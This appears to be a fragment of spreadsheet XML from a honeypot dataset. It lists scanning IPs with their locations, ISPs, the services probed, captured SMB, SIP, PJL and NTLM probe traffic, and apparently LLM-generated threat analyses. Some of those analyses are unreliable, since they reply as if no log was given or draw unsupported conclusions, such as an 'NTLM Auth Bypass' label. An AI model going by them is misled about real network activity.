'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:57ec:b005</t>
  </si>
  <si>
    <t>34fa09b6854ce823cf8b763b0ab896a8</t>
  </si>
  <si>
    <t>103.214.188.73</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>UP</t>
  </si>
  <si>
    <t>Uttar Pradesh</t>
  </si>
  <si>
    <t>Varanasi</t>
  </si>
  <si>
    <t>Varanasi (Gurūbāgh)</t>
  </si>
  <si>
    <t>1253405</t>
  </si>
  <si>
    <t>221002</t>
  </si>
  <si>
    <t>25.3048</t>
  </si>
  <si>
    <t>82.9938</t>
  </si>
  <si>
    <t>134908</t>
  </si>
  <si>
    <t>IKON BROADBAND PRIVATE LIMITED</t>
  </si>
  <si>
    <t>Ikon Broadband Private Limited</t>
  </si>
  <si>
    <t>2016-04-13</t>
  </si>
  <si>
    <t>IKONBROADBAND</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:67d6:bc49</t>
  </si>
  <si>
    <t>440b37ac129663aeb38ce672a1c0cf5c</t>
  </si>
  <si>
    <t>115.96.207.38</t>
  </si>
  <si>
    <t>Mumbai (Parel)</t>
  </si>
  <si>
    <t>400012</t>
  </si>
  <si>
    <t>19.0027</t>
  </si>
  <si>
    <t>72.8286</t>
  </si>
  <si>
    <t>Hathway Cable and Datacom Limited</t>
  </si>
  <si>
    <t>2008-07-25</t>
  </si>
  <si>
    <t>HATHWAY-NET</t>
  </si>
  <si>
    <t>::ffff:7360:cf26</t>
  </si>
  <si>
    <t>b41c550bb3bb2a6191725d8183621c90</t>
  </si>
  <si>
    <t>178.245.149.180</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>Kartal</t>
  </si>
  <si>
    <t>Pendik</t>
  </si>
  <si>
    <t>740616</t>
  </si>
  <si>
    <t>40.8994</t>
  </si>
  <si>
    <t>29.2108</t>
  </si>
  <si>
    <t>16135</t>
  </si>
  <si>
    <t>TURKCELL-AS</t>
  </si>
  <si>
    <t>Turkcell Internet</t>
  </si>
  <si>
    <t>::ffff:b2f5:95b4</t>
  </si>
  <si>
    <t>39c585f8cea1af3b103dcb31bf025f4c</t>
  </si>
  <si>
    <t>115.242.156.198</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2</t>
  </si>
  <si>
    <t>1433&amp;&amp;53724&amp;&amp;26780</t>
  </si>
  <si>
    <t>Dakshin Kannad</t>
  </si>
  <si>
    <t>Mangaluru</t>
  </si>
  <si>
    <t>1263780</t>
  </si>
  <si>
    <t>575001</t>
  </si>
  <si>
    <t>12.9141</t>
  </si>
  <si>
    <t>74.856</t>
  </si>
  <si>
    <t>::ffff:73f2:9cc6</t>
  </si>
  <si>
    <t>ec83ad8f26aac3ae39b713f254c04263</t>
  </si>
  <si>
    <t>115.247.101.170</t>
  </si>
  <si>
    <t>AP</t>
  </si>
  <si>
    <t>Andhra Pradesh</t>
  </si>
  <si>
    <t>Spsr Nellore</t>
  </si>
  <si>
    <t>Nellore</t>
  </si>
  <si>
    <t>1261529</t>
  </si>
  <si>
    <t>524001</t>
  </si>
  <si>
    <t>14.4499</t>
  </si>
  <si>
    <t>79.987</t>
  </si>
  <si>
    <t>::ffff:73f7:65aa</t>
  </si>
  <si>
    <t>d8a448062415bc99d019a50a9369bd8d</t>
  </si>
  <si>
    <t>154.212.141.147</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_MYSQL_H31&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_POP3_H13&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_HTTPS_H20&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;59899&amp;&amp;143&amp;&amp;443&amp;&amp;21&amp;&amp;110&amp;&amp;9100&amp;&amp;1433&amp;&amp;3306&amp;&amp;23&amp;&amp;445&amp;&amp;5432&amp;&amp;NA&amp;&amp;3389&amp;&amp;25&amp;&amp;80&amp;&amp;45186&amp;&amp;38241</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;GET&amp;&amp;request&amp;&amp;query&amp;&amp;command&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.147,60346)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.37.11:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.147;rport=56760'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 95.164.118.29:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.8.76:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.147;rport=47486'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.97.67:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.146.12.172:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 122.170.7.108:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.147;rport=54423'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '5.180.55.39:38241', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '5.180.55.39:38241', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8d93</t>
  </si>
  <si>
    <t>No activity detected for POP3 service, which is unusual as it's typically used by legitimate email clients. This may indicate an attempt to scan or probe the system. The absence of traffic suggests potential scanning or probing activities. &amp;&amp; An unknown host is attempting to access a generic web page on the server.
The request is coming from an IP address that does not seem to be associated with legitimate traffic.
This could indicate a scanning or probing attempt by a malicious actor. &amp;&amp; A GET request is being made to a server with an unusual IP address 5.180.55.39 and a non-standard port number 38241, suggesting potential malicious scanning activity. This could be a reconnaissance attempt by a botnet or an attacker trying to identify vulnerabilities. The use of the '*' wildcard in the Accept header may also indicate an attempt to exploit known vulnerabilities. &amp;&amp; An attacker is attempting to access the server using an unauthorized NTLM authentication attempt. The request is being made from a suspicious IP address and contains a User-Agent string that suggests a legitimate browser, but may be spoofed. The request is a GET method for the root directory '/'. &amp;&amp; A Windows-based system is attempting to access a service using an old NTLM authentication method, which may be a scan or brute-force attempt. The User-Agent string suggests a legitimate browser, but the combination with NTLM raises suspicion about its legitimacy. A potential malicious actor is probing for vulnerable services.</t>
  </si>
  <si>
    <t>No Login Attempt &amp;&amp; Port Scan &amp;&amp; Scanning GET &amp;&amp; NTLM Auth &amp;&amp; NTLM Auth Bypass</t>
  </si>
  <si>
    <t>ebe0897e4df869e30ffc6b8fd04734c7</t>
  </si>
  <si>
    <t>45.229.24.179</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;445&amp;&amp;50082&amp;&amp;NA</t>
  </si>
  <si>
    <t>RN</t>
  </si>
  <si>
    <t>Rio Grande do Norte</t>
  </si>
  <si>
    <t>Parnamirim</t>
  </si>
  <si>
    <t>3392998</t>
  </si>
  <si>
    <t>-5.91556</t>
  </si>
  <si>
    <t>-35.2628</t>
  </si>
  <si>
    <t>267096</t>
  </si>
  <si>
    <t>HELLO WEB TELECOMUNICACOES E SERVICOS LTDA</t>
  </si>
  <si>
    <t>Hello Web Telecomunicacoes E Servicos Ltda</t>
  </si>
  <si>
    <t>Hello Web Telecomunicacoes E Servicos Ltda EPP</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,56620)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,57244)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,64773)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,64811)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,49323)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,49343)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,5252)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,5429)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,42790)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,32696)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,32248)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,51184)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,50888)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,36259)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,36378)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,60031)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,34219)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,58244)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,14613)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,19854)}</t>
  </si>
  <si>
    <t>::ffff:2de5:18b3</t>
  </si>
  <si>
    <t>Possible malicious activity is an incoming SMB connection from a suspicious IP address (45.229.24.179) to a system port (19854). This could be an attempt to access or exploit the system's shared resources. The source IP may be attempting unauthorized file sharing or access. &amp;&amp; A potential SMB connection attempt was made from IP address 45.229.24.179. This could be an unauthorized access attempt to the server's file shares or a malicious attack to spread malware through shared files. &amp;&amp; There is insufficient data to analyze possible malicious activity.</t>
  </si>
  <si>
    <t>d891d78398c4b6dcbbdb616f81a2977c</t>
  </si>
  <si>
    <t>200.166.5.18</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;16847&amp;&amp;54078&amp;&amp;NA</t>
  </si>
  <si>
    <t>CE</t>
  </si>
  <si>
    <t>Ceará</t>
  </si>
  <si>
    <t>Fortaleza</t>
  </si>
  <si>
    <t>3399415</t>
  </si>
  <si>
    <t>60000-000</t>
  </si>
  <si>
    <t>-3.73272</t>
  </si>
  <si>
    <t>-38.527</t>
  </si>
  <si>
    <t>4230</t>
  </si>
  <si>
    <t>CLARO S.A.</t>
  </si>
  <si>
    <t>Claro S.A</t>
  </si>
  <si>
    <t>Omega Distribuidora de Produtos Alimenticios Ltda</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,50335)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,50445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,61783)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,61848)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,51784)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,51915)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,49674)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,49742)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,60153)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,60204)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,53983)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,54071)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,58684)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,59471)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,54390)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,54660)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,61352)}</t>
  </si>
  <si>
    <t>::ffff:c8a6:512</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze. 
(Note: Please provide the actual log data for analysis) &amp;&amp; Insufficient data to analyze. The log shows no information about any malicious activity or service interactions. No notable events are recorded. &amp;&amp; Malicious activity detected, likely an attempt to exploit Microsoft SQL Server using MSSQL protocol. No actual malicious action was observed due to the honeypot's neutral response. The absence of "Data_MSSQL" value may indicate a probing or reconnaissance effort.</t>
  </si>
  <si>
    <t>I'm ready to analyze the log data when it's provided. Please go ahead and share the logs!</t>
  </si>
  <si>
    <t>19f8cb886762e53fbb9515129c18f727</t>
  </si>
  <si>
    <t>91.106.95.98</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;2627&amp;&amp;NA&amp;&amp;49587</t>
  </si>
  <si>
    <t>06</t>
  </si>
  <si>
    <t>Khuzestan</t>
  </si>
  <si>
    <t>Shahrestān-e Bandar-e Māhshahr</t>
  </si>
  <si>
    <t>Bandar-e Emam Khomeyni</t>
  </si>
  <si>
    <t>8521444</t>
  </si>
  <si>
    <t>30.5542</t>
  </si>
  <si>
    <t>49.0514</t>
  </si>
  <si>
    <t>56503</t>
  </si>
  <si>
    <t>PJSC Badr Rayan Jonoob</t>
  </si>
  <si>
    <t>Badr-Rayan</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,49658)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,49751)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,56707)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,58904)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,64963)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,65054)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,50880)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,51141)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,50051)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,50126)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,63602)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,63694)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,59709)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,59790)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,57424)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,57550)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,59505)}</t>
  </si>
  <si>
    <t>::ffff:5b6a:5f62</t>
  </si>
  <si>
    <t>Unsuccessful SMB login attempt from unknown IP address 91.106.95.98, attempting to connect on port 59505. This may indicate a brute force attack or malicious scanning of the system's network resources. The target system is likely vulnerable to exploitation if weak credentials are used. &amp;&amp; A suspicious incoming connection has been detected from IP address 91.106.95.98 on port 59505, possibly indicating an attempt to exploit a vulnerability or gain unauthorized access. This could be a sign of malware propagation or a brute force attack against the SMB service. The IP address may be linked to malicious activity. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No log data provided, cannot determine malicious activity.</t>
  </si>
  <si>
    <t>a3f70e7d2e69822c65b7e835d00a6049</t>
  </si>
  <si>
    <t>124.106.67.118</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_LDAP_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;61524&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}</t>
  </si>
  <si>
    <t>::ffff:7c6a:4376</t>
  </si>
  <si>
    <t>5b18a513b60f1a16e1a6bfe45cb95a13</t>
  </si>
  <si>
    <t>223.207.241.48</t>
  </si>
  <si>
    <t>2010-07-12</t>
  </si>
  <si>
    <t>::ffff:dfcf:f130</t>
  </si>
  <si>
    <t>78a3bbe8c9bd90a3e3994ea6b835b433</t>
  </si>
  <si>
    <t>103.166.136.65</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H40&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_HTTP_H25&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_NTP_H6&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_SMB_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5900&amp;&amp;80&amp;&amp;445&amp;&amp;123&amp;&amp;443&amp;&amp;389&amp;&amp;9100&amp;&amp;35220&amp;&amp;1433</t>
  </si>
  <si>
    <t>{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}</t>
  </si>
  <si>
    <t>-6.22911</t>
  </si>
  <si>
    <t>106.813</t>
  </si>
  <si>
    <t>PT Adhi Karya Nusa</t>
  </si>
  <si>
    <t>2021-04-23</t>
  </si>
  <si>
    <t>IDNIC-ADHIKN-ID</t>
  </si>
  <si>
